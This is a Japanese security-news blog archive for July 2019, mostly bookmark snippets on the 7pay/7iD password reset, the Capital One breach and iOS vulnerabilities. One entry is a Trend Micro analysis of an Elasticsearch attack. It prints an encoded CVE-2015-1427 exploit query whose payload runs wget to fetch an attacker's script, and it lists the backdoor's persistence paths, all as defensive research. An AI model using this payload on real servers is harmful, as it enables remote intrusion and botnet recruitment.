月別アーカイブ: 2019年7月

PHP fwdays’20

We are thrilled to announce the 8th edition of PHP fwdays conference — the biggest PHP conf of Eastern Europe, which will be held on May 30, 2020 in Kyiv, Ukraine.

Three parallel tracks and community discussions are all dedicated to PHP development, tools and issues to be solved. Join more than 900 developers from all over the world to learn, discuss and solve.

You are welcome to submit the talk via Call For Papers till December 24th and visit awesome Kyiv in summer!

「有料記事を無料で見られるGoogle Chrome 76の機能」によりかえって情報が高価になるという指摘 – GIGAZINE

「有料記事を無料で見られるGoogle Chrome 76の機能」によりかえって情報が高価になるという指摘 - GIGAZINE

「有料記事を無料で見られるGoogle Chrome 76の機能」によりかえって情報が高価になるという指摘 - GIGAZINE

by Nikin 2019年7月30日に公開された「Google Chrome 76」ではシークレットモードが強化されており、無料ユーザーから有料記事をブロックするペイウォールの一部が回避可能になりました。しかし、これによりかえって情報がユーザーの手に届きにくいものになってしまうと、広告技術などのニュースを扱う海外メディアWhat'...

はてなブックマーク - 「有料記事を無料で見られるGoogle Chrome 76の機能」によりかえって情報が高価になるという指摘 - GIGAZINE はてなブックマークに追加

7iDのパスワードが強制リセットされこれに絡むトラブルが多数報告される | スラド セキュリティ

7iDのパスワードが強制リセットされこれに絡むトラブルが多数報告される | スラド セキュリティ

7iDのパスワードが強制リセットされこれに絡むトラブルが多数報告される | スラド セキュリティ

セブン&アイ・ホールディングスが7月30日、傘下の各種サービスで共通利用できる「7iD」利用者の全パスワードを強制的にリセットしたことを発表した(発表PDF、ITmedia)。セキュリティ強化の一環とされているが、なぜパスワードリセットを行ったかの具体的な説明はない。また、あわせてパスワードの設定条件の変更も行...

はてなブックマーク - 7iDのパスワードが強制リセットされこれに絡むトラブルが多数報告される | スラド セキュリティ はてなブックマークに追加

7iDのパスワードが強制リセットされこれに絡むトラブルが多数報告される

セブン&アイ・ホールディングスが7月30日、傘下の各種サービスで共通利用できる「7iD」利用者の全パスワードを強制的にリセットしたことを発表した(発表PDFITmedia)。セキュリティ強化の一環とされているが、なぜパスワードリセットを行ったかの具体的な説明はない。また、あわせてパスワードの設定条件の変更も行ったという。

一方でこれに関連して複数のトラブルが発生しているようだ(Togetterまとめ)。その中でも大きいものとして、パスワードを再設定しようとして誤って新規にアカウントを作成してしまい、7payの残高やクーポンが消えてしまったように見えるという問題が話題となっている。なお、セブン&アイ・ホールディングスによると残高やバッジ、クーポンなどが消えたということはないという(ITmediaの別記事)。

また、パスワード再設定の際には生年月日と電話番号、IDの入力が必要で、これらを正しく入力するとメールでパスワード再設定メールが届くのだが、このメールが届かないというトラブルも発生している(Togetterまとめ)。セブンネットショッピング時代は生年月日のうち年と月のみが登録されており、この時代にアカウントを作成したユーザーについてはオムニ7への以降後勝手に生年月日のうち日がが「1日」に設定されていたという報告や、登録メールアドレスを変更していたにも関わらず初回登録時のメールアドレスにパスワード再設定メールが送信されていた、といった報告があるようだ。

すべて読む | セキュリティセクション | セキュリティ | ソフトウェア | バグ | 携帯電話 | プライバシ | この記事をTwitterでつぶやく この記事をFacebookで共有 この記事をGoogle Plusで共有 このエントリーをはてなブックマークに追加

関連ストーリー:
オムニ7アプリのソースコードがGitHub上で公開されていた可能性が指摘される 2019年07月24日
7pay問題を扱った記事に対し「それはウォーターフォール・モデルではない」との指摘 2019年07月18日
セブン-イレブンアプリに外部IDで不正ログインできる脆弱性が存在するとの報道 2019年07月12日
不正利用問題が発生した7payアプリ、開発期間は実質半年、テスト期間は実質1か月 2019年07月10日
7payの登録でおにぎり無料クーポンが貰えるキャンペーン、アカウント作成を繰り返すことで何度でもクーポンを入手できる仕様 2019年07月05日
7payで不正利用被害報告が相次ぐ 2019年07月04日

米大手銀行から1億人分の個人データが漏洩、元Amazon従業員が容疑者として拘束される

Anonymous Coward曰く、

米大手金融機関Capital One Financialで、不正アクセスによる大規模な個人情報漏洩事件が発生した。漏洩件数は1億600万件にも上り、大手銀行による情報漏洩事件としては過去最大規模だという(日経新聞TechCrunchBloombergReuters)。

容疑者はすでにFBIに拘束されているとのこと。漏洩したデータは米Amazon Web Services(AWS)のクラウドサービスである「Amazon S3」上に保管されていたものだったという。この容疑者は米Amazon.comの元従業員都のことだが、AWSはAWSのシステムを狙った攻撃やAWSの脆弱性によるものではないと述べている。

すべて読む | セキュリティセクション | セキュリティ | クラウド | 情報漏洩 | プライバシ | この記事をTwitterでつぶやく この記事をFacebookで共有 この記事をGoogle Plusで共有 このエントリーをはてなブックマークに追加

関連ストーリー:
Facebookから収集された4800万人相当のユーザーデータがネット上に放置されていた 2018年04月24日
原子力規制委員会の非公開文書がクラウドソーシングサイト経由で流出 2015年03月31日
多くの企業で内部犯行による情報漏洩などに対する問題意識が高まりつつある 2015年03月27日
Uber、個人情報が入ったデータベースにアクセスするための情報をGitHub上で公開していた 2015年03月06日

制御システムのセキュリティリスク分析ガイド補足資料:「制御システム関連のサイバーインシデント事例」シリーズ:IPA 独立行政法人 情報処理推進機構

制御システムのセキュリティリスク分析ガイド補足資料:「制御システム関連のサイバーインシデント事例」シリーズ:IPA 独立行政法人 情報処理推進機構

制御システムのセキュリティリスク分析ガイド補足資料:「制御システム関連のサイバーインシデント事例」シリーズ:IPA 独立行政法人 情報処理推進機構

制御システムを保有する事業者にとって、国内外で発生したサイバーインシデント事例の情報をもとに、自社の制御システムに対して同様の脅威が発生した場合のリスクアセスメント(リスクの特定・分析・評価)を実施することは、セキュリティリスク管理の強化につながります。 IPA(情報処理推進機構)は、制御システムに...

はてなブックマーク - 制御システムのセキュリティリスク分析ガイド補足資料:「制御システム関連のサイバーインシデント事例」シリーズ:IPA 独立行政法人 情報処理推進機構 はてなブックマークに追加

7iDのパスワード再設定で「残高消えた」報告相次ぐ セブン&アイは不具合を否定、ユーザーの誤解か – ITmedia NEWS

7iDのパスワード再設定で「残高消えた」報告相次ぐ セブン&アイは不具合を否定、ユーザーの誤解か - ITmedia NEWS

7iDのパスワード再設定で「残高消えた」報告相次ぐ セブン&アイは不具合を否定、ユーザーの誤解か - ITmedia NEWS

「7iD」のパスワード一斉リセットに伴ってパスワードを再設定したユーザーの一部から「アカウントの残高が消えた」「再設定のメールが届かない」と報告があるが、セブン&アイ・ホールディングスはシステム障害ではないと説明している。 不正ログイン被害が相次いだモバイル決済サービス「7pay」や、通販サイト「オムニ7...

はてなブックマーク - 7iDのパスワード再設定で「残高消えた」報告相次ぐ セブン&アイは不具合を否定、ユーザーの誤解か - ITmedia NEWS はてなブックマークに追加

php Central Europe 2019

Thanks to the support of PHP Usergroup Dresden, our conference will be held in the Federal Republic of Germany. phpCE is an event addressed to a vast group of developers and PHP enthusiasts from Central Europe. We hope that you enjoy our diverse line-up and it will turn out to be so interesting that you too will want to join us. In addition, for the first time we will meet at... the cinema!

Location and dates:
October 4, 2019 - the Workshop Day in the Pullman Dresden Newa hotel,
October 5-6, 2019 - Conference Days in the UFA Kristallpalast multiplex.

Tickets are still available under 2019.phpce.eu/#tickets. Welcome!

また混乱のセブンに聞いた 「7pay、残高ゼロに」報告が相次ぐ理由は? : J-CASTニュース

また混乱のセブンに聞いた 「7pay、残高ゼロに」報告が相次ぐ理由は? : J-CASTニュース

また混乱のセブンに聞いた 「7pay、残高ゼロに」報告が相次ぐ理由は? : J-CASTニュース

キャッシュレス決済サービス「7pay」不正アクセス問題を受け、セブン&アイ・ホールディングスはグループ共通アカウント「7iD」のパスワードを強制的に一斉リセットしたことを発表したが、新たなトラブルの報告があがった。パスワードを再設定したところ、チャージ残高が「ゼロ円」になったという声がツイッターで相次い...

はてなブックマーク - また混乱のセブンに聞いた 「7pay、残高ゼロに」報告が相次ぐ理由は? : J-CASTニュース はてなブックマークに追加

7iDパスワードリセット 誤解でID変更相次ぐ  「7pay入金額がゼロに」 – 毎日新聞

7iDパスワードリセット 誤解でID変更相次ぐ  「7pay入金額がゼロに」 - 毎日新聞

7iDパスワードリセット 誤解でID変更相次ぐ  「7pay入金額がゼロに」 - 毎日新聞

セブン&アイ・ホールディングス(HD)は31日、グループのインターネットサービスに使う共通ID「7iD」のパスワードを一斉にリセットした件に関連して、誤解してIDを新規登録した会員から「(スマートフォン決済サービスの)7pay(セブンペイ)の入金額がゼロになった」といった相談が相次いでいると明らかにした。 IDを...

はてなブックマーク - 7iDパスワードリセット 誤解でID変更相次ぐ  「7pay入金額がゼロに」 - 毎日新聞 はてなブックマークに追加

7iDパスワードリセット 誤解でID変更相次ぐ 「7pay入金額がゼロに」 – 毎日新聞

7iDパスワードリセット 誤解でID変更相次ぐ 「7pay入金額がゼロに」 - 毎日新聞

7iDパスワードリセット 誤解でID変更相次ぐ 「7pay入金額がゼロに」 - 毎日新聞

セブン&アイ・ホールディングスが、スマートフォン決済サービス「7pay」(セブンペイ)などグループのインターネットサービスに使う共通ID「7iD」のパスワードを一斉にリセットしたことに伴い、31日までに一部の利用者の間で混乱が広がった。 同社がパスワードの再設定を求めたのに対し、利用者が誤ってIDも変更するケ...

はてなブックマーク - 7iDパスワードリセット 誤解でID変更相次ぐ 「7pay入金額がゼロに」 - 毎日新聞 はてなブックマークに追加

推定5億円超もするiOSの6つの脆弱性をGoogleの研究者が開示 – GIGAZINE

推定5億円超もするiOSの6つの脆弱性をGoogleの研究者が開示 - GIGAZINE

推定5億円超もするiOSの6つの脆弱性をGoogleの研究者が開示 - GIGAZINE

by Luiz Felipe Google内に存在するゼロデイアタック専門の研究・開発チーム「Project Zero」が、Appleのモバイル向けOSである「iOS」上で複数のバグを発見しました。このバグを用いればユーザーの操作なしにiMessageアプリ経由で悪意のあるコードを実行可能になるとのことです。なお、Project Zeroが発見した6つのセキ...

はてなブックマーク - 推定5億円超もするiOSの6つの脆弱性をGoogleの研究者が開示 - GIGAZINE はてなブックマークに追加

7payパスワードリセットで残高が消える?→セブン広報「消えません」 SNS上のウワサを否定 – ねとらぼ

7payパスワードリセットで残高が消える?→セブン広報「消えません」 SNS上のウワサを否定 - ねとらぼ

7payパスワードリセットで残高が消える?→セブン広報「消えません」 SNS上のウワサを否定 - ねとらぼ

セブン-イレブンのスマートフォン決済アプリ「7pay(セブンペイ)」で、不正アクセスへの対応のため7月30日に全アカウントのパスワードリセットが実施されました(関連記事)。 SNS上では「このリセットのせいで、チャージしてあった残高が消えてしまった」といった報告が拡散中です。ねとらぼ編集部が運営元のセブン&...

はてなブックマーク - 7payパスワードリセットで残高が消える?→セブン広報「消えません」 SNS上のウワサを否定 - ねとらぼ はてなブックマークに追加

「7payは1回やめたらどうか」「大企業の自前主義見直すべき」キャッシュレス推進派の小林衆院議員 | BUSINESS INSIDER JAPAN

「7payは1回やめたらどうか」「大企業の自前主義見直すべき」キャッシュレス推進派の小林衆院議員 | BUSINESS INSIDER JAPAN

「7payは1回やめたらどうか」「大企業の自前主義見直すべき」キャッシュレス推進派の小林衆院議員 | BUSINESS INSIDER JAPAN

7月30日、セブン&アイ・ホールディングスは7pay問題にからんで、7iDのパスワード強制リセットを実施した。 撮影:小林優多郎 7payをめぐる脆弱性を背景とする不正使用事件。セブン&アイ・ホールディングスは7月30日、7payのほか同社の各種ECサービスなどで共通使用する「7iD」のパスワードの強制リセットを実施した。 7...

はてなブックマーク - 「7payは1回やめたらどうか」「大企業の自前主義見直すべき」キャッシュレス推進派の小林衆院議員 | BUSINESS INSIDER JAPAN はてなブックマークに追加

「iOS」に潜む脆弱性のPoC、グーグルの研究者が公開 – ZDNet Japan

「iOS」に潜む脆弱性のPoC、グーグルの研究者が公開 - ZDNet Japan

「iOS」に潜む脆弱性のPoC、グーグルの研究者が公開 - ZDNet Japan

Googleのセキュリティチーム「Project Zero」の研究者2人によって、「iOS」に潜んでいる、「インタラクションを必要としない」セキュリティ脆弱性が6つ発見された。これら6つの脆弱性のうちの5つについて、このほど詳細な情報とPoC(概念実証)コードが公開された。なお、これらの脆弱性は「iMessage」クライアントを通...

はてなブックマーク - 「iOS」に潜む脆弱性のPoC、グーグルの研究者が公開 - ZDNet Japan はてなブックマークに追加

2019年になっても3分の1の企業がWindows XPを使い続けているという現実 – GIGAZINE

2019年になっても3分の1の企業がWindows XPを使い続けているという現実 - GIGAZINE

2019年になっても3分の1の企業がWindows XPを使い続けているという現実 - GIGAZINE

by Linux Screenshots ビジネスの世界では「2019年現在でも企業の3分の1がWindows XPを使い続けている」ことがIT業界向けオンラインコミュニティを運営するSpiceworksの調査により明らかになりました。 Network and Endpoint Security PDF Report - Spiceworks https://www.spiceworks.com/marketing/network-security/p...

はてなブックマーク - 2019年になっても3分の1の企業がWindows XPを使い続けているという現実 - GIGAZINE はてなブックマークに追加

バックドア型マルウェア「Setag/BillGates」により「Elasticsearch」サーバをボット化する攻撃を確認

サイバー犯罪者が全文検索エンジン「Elasticsearch」のサーバを狙うのは、法人組織におけるその人気普及を考えると珍しいことではありません。事実、2019年第1四半期にはElasticsearchサーバの脆弱性やセキュリティの不備を突く攻撃の急増が見られました。トレンドマイクロの確認では、これらの攻撃は主に仮想通貨発掘マルウェアを送り込むものでした。

しかし最近、直接的に金銭的な利益をもたらすマルウェアではなく、バックドア型マルウェア「Setag(別名:BillGates、トレンドマイクロでは「ELF_SETAG.SM」として検出)」を送り込む攻撃が確認されました。これにより攻撃者は分散型サービス拒否(Distributed Denial of Service、DDoS)攻撃のためのボットネットを構築します。

図1:攻撃の流れ

図1:攻撃の流れ

攻撃はインターネット上でアクセス可能なElasticsearchのデータベースまたはサーバを検索するところから始まります。攻撃者は、ElasticsearchのクエリにエンコードされたJavaのコマンドを含む細工した文字列を使用するコマンドインジェクション攻撃を行います。脆弱性によりこのコマンドが実行されると、不正サイトから第1段階の不正スクリプトがダウンロードされます。調査によると、この不正サイトは使い捨てて置き換えることが可能のようでした。続いて、また別のサイトから第2段階のスクリプトを取得します。このサイトは攻撃者により侵害された正規サイトと考えられます。

使い捨てのドメインや侵害したWebサイトを利用してスクリプトをダウンロードする手口は注目に値します。これにより攻撃者はドメインが検出されても、使い捨てて別のドメインに切り替えることが可能です。また、自身でWebサイトを作成する代わりに侵害したWebサイトを利用することにより、自身のインフラストラクチャの検出を回避することができます。

■2段階で不正スクリプトを実行

この攻撃はElasticsearchのスクリプトエンジン「Groovy」の古い脆弱性「CVE-2015-1427」を利用します。この脆弱性に対処する修正プログラムは2015年2月に公開されています。影響を受けるバージョンは1.3.0~1.3.7および1.4.0~1.4.2です。以下は攻撃者が利用する細工されたクエリの例です。黄色くハイライトされた部分が最初に実行されるコマンドです。

request_url=”<省略>[:]9200/_search?source=%7B%22query%22%3A+%7B%22filtered%22%3A+%7B%22query%22%3A+%7B%22match_all%22%3A+%7B%7D%7D%7D%7D%2C+%22script_fields%22%3A+%7B%22exp%22%3A+%7B%22script%22%3A+%22import+java.util.%2A%3Bimport+java.io.%2A%3BString+str+%3D+%5C%22%5C%22%3BBufferedReader+br+%3D+new+BufferedReader%28new+InputStreamReader%28Runtime.getRuntime%28%29.exec%28%5C%22wget+<省略>%2Fs67.sh+-O+S67%5C%22%29.getInputStream%28%29%29%29%3BStringBuilder+sb+%3D+new+StringBuilder%28%29%3Bwhile%28%28str%3Dbr.readLine%28%29%29%21%3Dnull%29%7Bsb.append%28str%29%3Bsb.append%28%5C%22%5Cr%5Cn%5C%22%29%3B%7Dsb.toString%28%29%3B%22%7D%7D%2C+%22size%22%3A+1%7D

先述のように、攻撃には2つの段階があります。まずドロッパが図2のように第1段階のスクリプト「s67.sh」を実行します。使用するシェルの種類とパスはこのスクリプト内で定義されています。「s67.sh」は、ファイアウォールを停止し、curlコマンドを使用して第2段階のスクリプト「s66.sh」をダウンロードします。curlコマンドによる取得に失敗した場合、wgetコマンドを使用します。

図2:第1段階のスクリプト「s67.sh」

図2:第1段階のスクリプト「s67.sh」

第2段階のスクリプトは、第1段階のスクリプトと同様に、使用するシェルを指定しファイアウォールを停止します。加えて、「/tmp」ディレクトリから競合する仮想通貨発掘ツールと考えられる特定のファイルを設定ファイルと合わせて削除します。次に、既存の仮想通貨発掘プロセスと自身にとって不都合なその他のプロセスを停止します。これは以前に別の攻撃者がサーバを侵害し、仮想通貨を発掘させていることを想定した活動と言えます。

図3:競合するプロセスを停止する第2段階のスクリプト

図3:競合するプロセスを停止する第2段階のスクリプト

続いて図4のように、初期の感染の痕跡を削除し、特定のTCPポートをリッスンしているプロセスを停止します。

図4:特定のTCPポートをリッスンしているプロセスを終了するコード

図4:特定のTCPポートをリッスンしているプロセスを終了するコード

最後に、図5のようにバイナリファイルをダウンロードします。このバイナリファイルは、侵害されたと思われるWebサイトまたはグレーなWebサイトにホストされています。

図5:バイナリファイルをダウンロードするコード

図5:バイナリファイルをダウンロードするコード

■バックドア型マルウェア「Setag/BillGates」

最後にダウンロードされるバイナリファイル検体を解析した結果、システム情報の窃取とDDoS攻撃が可能なバックドア型マルウェアであることが判明しました。

この検体は、AKAMAIにより「BillGates」と命名されているマルウェアの特徴を示していました。BillGatesは2014年に初めて確認されたマルウェアであり、トレンドマイクロでは「Setag」と呼称しています。以前にはこれと同じバックドア型マルウェアが、Webアプリケーション開発フレームワーク「Apache Struts 2」における遠隔からのコード実行(Remote Code Execution、RCE)脆弱性「CVE-2017-5638」利用していたことが確認されています。また、最近になって亜種がボットネットに関連した活動で使用されていることも確認しています。

この検体は、システムを乗っ取りDDoS攻撃を行ったことで2014年に初めて確認されたマルウェア「BillGates」の特徴を示していました。トレンドマイクロは最近、BillGatesの亜種がボットネットに関連した活動に関与していることを確認しています。

このマルウェアは図6のように、デバッグを回避し、変更をチェックするコードを備えています。また、複数のシステムツールを自身のコピーに置き換え、元のファイルを「/usr/bin/dpkgd」ディレクトリに移動します。さらに、活動を持続するために、自身のコピーを作成するスクリプトを以下のパスに作成します。

  • /etc/rc{1-5}.d/S97DbSecuritySpt
  • /etc/rc{1-5}.d/S99selinux
  • /etc/init.d/selinux
  • /etc/init.d/DbSecuritySpt

図6:バックドア型マルウェア「BillGates」のコード

図6:バックドア型マルウェア「BillGates」のコード
デバッグを回避(上段左)多段階の実行(上段中央)
実行可能なDDoS攻撃の種類(上段右)置き換えるシステムツールの一覧(下段)

■被害に遭わないためには

今回の攻撃は、インターネットからElasticsearchにアクセス可能なこと、2015年に既に修正されている脆弱性が更新されていないことの2点が揃わないと被害に遭うことはありません。開発元のElasticが公開している、Elasticsearchの適切な設定とセキュリティ機能を有効化する方法に関するガイドラインに従うとともに、最新の修正プログラムを適用することで被害に遭う危険性はほとんどなくなります。

トレンドマイクロが確認してきたElasticsearchを狙う攻撃の多くは比較的直截的であり、通常は金銭を目的とするものでした。攻撃者は通常、脆弱なまたは安全でないサーバを検索し、仮想通貨発掘マルウェアやランサムウェアを送り込みます。

それゆえ、今回の攻撃のように、検出を回避するための予防措置を取り、多段階の実行の手法を使用する攻撃には警戒すべきです。背後にいるサイバー犯罪者が、エンコードしたURLと侵害した正規のWebサイトにスクリプトをホストしていたのは、単にツールをテストしていたか、あるいは自身のインフラストラクチャを使用した実際の攻撃の前にその準備を行っていたことを意味しているかもしれません。

安全でないElasticsearchサーバがユーザの実生活に影響を与えた攻撃を考慮すると、今回の攻撃はデジタル資産を適切に保護することの重要性を強調する事例だと言えます。

データの分類ネットワークの分割、そして侵入防御のような対策もこのような攻撃に対処する上で有効です。

■トレンドマイクロの対策

クロスジェネレーションで進化を続ける「XGen™セキュリティ」は、AI 技術をはじめとする先進技術と実績の高いスレットインテリジェンスを融合した防御アプローチにより、データを保管するサーバ、データを交換するネットワーク、データを利用するユーザの各レイヤーで最適化されたセキュリティを提供します。Web/URLフィルタリング、挙動解析、カスタムサンドボックスのような機能を備えたクロスジェネレーション(XGen)セキュリティアプローチは、既知または未知/未公開の脆弱性を狙い、個人情報の窃取や暗号化、不正な仮想通貨発掘活動を行う脅威をブロックします。XGen は「Hybrid Cloud Security」、「User Protection」、そして「Network Defense」へのソリューションを提供するトレンドマイクロ製品に組み込まれています。

■侵入の痕跡(Indicators of Compromise、IoCs)

侵入の痕跡はこちらを参照してください。

※調査協力:Tony Bao

参考記事:

翻訳: 澤山 高士(Core Technology Marketing, Trend Micro™ Research)

7ID再設定でポイントや残高が消える原因はなぜ?対策を調べてみた! – 地球の裏側からご近所まで

7ID再設定でポイントや残高が消える原因はなぜ?対策を調べてみた! – 地球の裏側からご近所まで

7ID再設定でポイントや残高が消える原因はなぜ?対策を調べてみた! – 地球の裏側からご近所まで

こんにちは椎木です。 昨晩からかなり大問題の7IDの強制リセットですが、 再設定メールがこない。再設定したのにログインできない などなどの諸問題を乗り越え、漸くたどり着いたログインの先で ポイントや残高が消えている と言う鬼仕様まで装備されている事が判明しました。 これにはネットユーザーからも セブンが”ユ...

はてなブックマーク - 7ID再設定でポイントや残高が消える原因はなぜ?対策を調べてみた! – 地球の裏側からご近所まで はてなブックマークに追加

iOSの脆弱性悪用した攻撃、最新iOS12.4でも一部未対応か – iPhone Mania

iOSの脆弱性悪用した攻撃、最新iOS12.4でも一部未対応か - iPhone Mania

iOSの脆弱性悪用した攻撃、最新iOS12.4でも一部未対応か - iPhone Mania

GoogleのPeoject Zeroは新たに、iOSでセキュリティ上の脆弱性が6つ発見されたと指摘しました。このうち5つはiOS12.4で対処済であるものの、1つは未だに対処されていないそうです。 未対応のバグも GoogleのProject Zeroとは、企業が対処する前に脆弱性を利用した「ゼロデイ攻撃」が行われないよう、ソフトウェアの脆弱性...

はてなブックマーク - iOSの脆弱性悪用した攻撃、最新iOS12.4でも一部未対応か - iPhone Mania はてなブックマークに追加

祖国という足かせ…亡命ウイグル人にも及ぶ中国の監視 写真4枚 国際ニュース:AFPBB News

祖国という足かせ…亡命ウイグル人にも及ぶ中国の監視 写真4枚 国際ニュース:AFPBB News

祖国という足かせ…亡命ウイグル人にも及ぶ中国の監視 写真4枚 国際ニュース:AFPBB News

ニュージーランド・オークランドでAFPのインタビューに答えるウイグル人のシャウドゥン・アブドゥグプルさんを捉えた映像の一場面(2019年7月22日撮影)(c) Diego OPATOWSKI / AFPTV / AFP 【7月31日 AFP】10年前、約200人が死亡した新疆ウイグル自治区(Xinjiang Uighur Autonomous Region)での大きな暴動をきっかけに...

はてなブックマーク - 祖国という足かせ…亡命ウイグル人にも及ぶ中国の監視 写真4枚 国際ニュース:AFPBB News はてなブックマークに追加

ほしぞらー on Twitter: “わい「セブンイレブンアプリの会員コード表示すんね」 店員さん「はーい ピッ」 わ「支払いは現金で」 店「?もうお預かりしましたけど?」 わ「へ?7payには1円もチャージしてないし口座も登録してないんですけど??」 店「レジは支払… https://t.co/GLJN2GGqjx”

ほしぞらー on Twitter: "わい「セブンイレブンアプリの会員コード表示すんね」 店員さん「はーい ピッ」 わ「支払いは現金で」 店「?もうお預かりしましたけど?」 わ「へ?7payには1円もチャージしてないし口座も登録してないんですけど??」 店「レジは支払… https://t.co/GLJN2GGqjx"

ほしぞらー on Twitter: "わい「セブンイレブンアプリの会員コード表示すんね」 店員さん「はーい ピッ」 わ「支払いは現金で」 店「?もうお預かりしましたけど?」 わ「へ?7payには1円もチャージしてないし口座も登録してないんですけど??」 店「レジは支払… https://t.co/GLJN2GGqjx"

わい「セブンイレブンアプリの会員コード表示すんね」 店員さん「はーい ピッ」 わ「支払いは現金で」 店「?もうお預かりしましたけど?」 わ「へ?7payには1円もチャージしてないし口座も登録してないんですけど??」 店「レジは支払… https://t.co/GLJN2GGqjx

はてなブックマーク - ほしぞらー on Twitter: "わい「セブンイレブンアプリの会員コード表示すんね」 店員さん「はーい ピッ」 わ「支払いは現金で」 店「?もうお預かりしましたけど?」 わ「へ?7payには1円もチャージしてないし口座も登録してないんですけど??」 店「レジは支払… https://t.co/GLJN2GGqjx" はてなブックマークに追加

カメラなしホームセキュリティの「Minut」が8億7000万円調達 | TechCrunch Japan

カメラなしホームセキュリティの「Minut」が8億7000万円調達 | TechCrunch Japan

カメラなしホームセキュリティの「Minut」が8億7000万円調達 | TechCrunch Japan

スウェーデンのスタートアップであるMinutは、カメラを使わないホームセキュリティデバイスを開発し、同種のほかの製品よりプライバシーが守られるとしている。その同社が、シリーズAで800万ドル(約8億7000万円)を調達した。 このラウンドはKPN Venturesが主導し、国際的なエネルギーサービス企業のCentricaが参加した...

はてなブックマーク - カメラなしホームセキュリティの「Minut」が8億7000万円調達 | TechCrunch Japan はてなブックマークに追加

これはだまされる!受信して分かった「不在通知SMS」の巧妙さ | 日経 xTECH(クロステック)

これはだまされる!受信して分かった「不在通知SMS」の巧妙さ | 日経 xTECH(クロステック)

これはだまされる!受信して分かった「不在通知SMS」の巧妙さ | 日経 xTECH(クロステック)

次々と編み出されるネット詐欺の新手口。詐欺師は手を替え品を替えてユーザーをだまそうとする。その中で、筆者が特に“巧み”だと感じたのが、不在通知などを装う偽SMS(ショートメッセージサービス)である。最近、筆者にも送られてきた。改めて「これはだまされる」と痛感した。 SMSだから効果的 不在通知SMSを使う手口...

はてなブックマーク - これはだまされる!受信して分かった「不在通知SMS」の巧妙さ | 日経 xTECH(クロステック) はてなブックマークに追加

Recognizing Security Researchers in 2019

Who’s going to be on the Most Valuable Security Researcher list at Black Hat USA 2019? We’re not announcing the names—yet—but this is how we’ll determine who’s there. How do we define the Most Valuable Security Researchers?   The list at Black Hat will be the top tier of researchers based on not just the volume …

Recognizing Security Researchers in 2019 Read More »

ついにFlashが確認なしでブロックされるようになる「Google Chrome 76」安定版リリース – GIGAZINE

ついにFlashが確認なしでブロックされるようになる「Google Chrome 76」安定版リリース - GIGAZINE

ついにFlashが確認なしでブロックされるようになる「Google Chrome 76」安定版リリース - GIGAZINE

ウェブブラウザ「Google Chrome」の最新安定版であるバージョン76.0.3809.87がリリースされました。Chrome 76のベータ版で確認されていた通り、デフォルトで全てのFlashをブロックするようになったほか、PWA関連機能が強化されています。 New in Chrome 76  |  Web  |  Google Developers https://developers.google.com...

はてなブックマーク - ついにFlashが確認なしでブロックされるようになる「Google Chrome 76」安定版リリース - GIGAZINE はてなブックマークに追加

7Pay 謎の全利用者パスワードリセットを実施|楠 正憲(国際大学GLOCOM 客員研究員)

7Pay 謎の全利用者パスワードリセットを実施|楠 正憲(国際大学GLOCOM 客員研究員)

7Pay 謎の全利用者パスワードリセットを実施|楠 正憲(国際大学GLOCOM 客員研究員)

7payは7月30日午後に、全利用者のパスワードをリセットすると発表した。報道によると「(7iDを使う7payの不正利用問題で)パスワードリスト攻撃を受けた可能性が高く、リスクを極小化するため」(広報)と説明しているという。筆者はIdPを運用している立場でしばしば攻撃に直面して数百万人単位のパスワードのリセットを...

はてなブックマーク - 7Pay 謎の全利用者パスワードリセットを実施|楠 正憲(国際大学GLOCOM 客員研究員) はてなブックマークに追加

【徹底解説】スパイグループ「Turla」はPowerShellをどのように悪用しているのか | マルウェア情報局

【徹底解説】スパイグループ「Turla」はPowerShellをどのように悪用しているのか | マルウェア情報局

【徹底解説】スパイグループ「Turla」はPowerShellをどのように悪用しているのか | マルウェア情報局

悪質な活動を続けているスパイ集団「Turla(トゥールラ)」がPowerShellを利用してインメモリのみでマルウェアを実行するという新たなTTP(戦術、手法、手順)について、ESETのリサーチャーが分析しました。 本記事はESET Japanが提供する「ESETブログ」に掲載された「TurlaによるPowerShellの使用を徹底解説」を再編集...

はてなブックマーク - 【徹底解説】スパイグループ「Turla」はPowerShellをどのように悪用しているのか | マルウェア情報局 はてなブックマークに追加

7Payの不正利用を受け、7iDのパスワードを全員リセットに…→再設定するとクーポンや7Payの残高が消えたとの報告が相次ぐ – Togetter

7Payの不正利用を受け、7iDのパスワードを全員リセットに…→再設定するとクーポンや7Payの残高が消えたとの報告が相次ぐ - Togetter

7Payの不正利用を受け、7iDのパスワードを全員リセットに…→再設定するとクーポンや7Payの残高が消えたとの報告が相次ぐ - Togetter

セブン&アイが「7iD」パスワードを強制リセット、ユーザーに再設定を呼び掛け 7月29日時点で「7pay」被害額は3860万円に internet.watch.impress.co.jp/docs/news/1199… pic.twitter.com/c9LBBqcbY5

はてなブックマーク - 7Payの不正利用を受け、7iDのパスワードを全員リセットに…→再設定するとクーポンや7Payの残高が消えたとの報告が相次ぐ - Togetter はてなブックマークに追加

iPhoneを失くしたときに気をつけること〜アメリカで新手の詐欺が横行 – iPhone Mania

iPhoneを失くしたときに気をつけること〜アメリカで新手の詐欺が横行 - iPhone Mania

iPhoneを失くしたときに気をつけること〜アメリカで新手の詐欺が横行 - iPhone Mania

iPhone XSを配車サービスの車両に置き忘れたユーザーが、新手の詐欺に遭ったと米大手掲示板サイトRedditで報告しています。 Appleからの電話とみせかけて連絡 配車サービスLyftの車両にiPhone XSを置き忘れてしまったRedditユーザーCashForRedditGold氏は、「iPhoneを探す」機能を使ってデバイスを取り戻そうと試みまし...

はてなブックマーク - iPhoneを失くしたときに気をつけること〜アメリカで新手の詐欺が横行 - iPhone Mania はてなブックマークに追加

セブン&アイHDが「7iD」1650万人のパスワードを強制リセット、7pay不正利用対策で | 日経 xTECH(クロステック)

セブン&アイHDが「7iD」1650万人のパスワードを強制リセット、7pay不正利用対策で | 日経 xTECH(クロステック)

セブン&アイHDが「7iD」1650万人のパスワードを強制リセット、7pay不正利用対策で | 日経 xTECH(クロステック)

同社はパスワードをリセットした理由を「(7iDを使う7payの不正利用問題で)パスワードリスト攻撃を受けた可能性が高く、リスクを極小化するため」(広報)としている。 パスワード再設定の対象となるサービスはWebサイトやスマートフォンアプリから利用できるEC(電子商取引)サイト「omni7」のほか、セブン−イレブンア...

はてなブックマーク - セブン&アイHDが「7iD」1650万人のパスワードを強制リセット、7pay不正利用対策で | 日経 xTECH(クロステック) はてなブックマークに追加

2億台のデバイスに影響か――組み込み用リアルタイムOS「VxWorks」に11件の脆弱性を発見 – ITmedia エンタープライズ

2億台のデバイスに影響か――組み込み用リアルタイムOS「VxWorks」に11件の脆弱性を発見 - ITmedia エンタープライズ

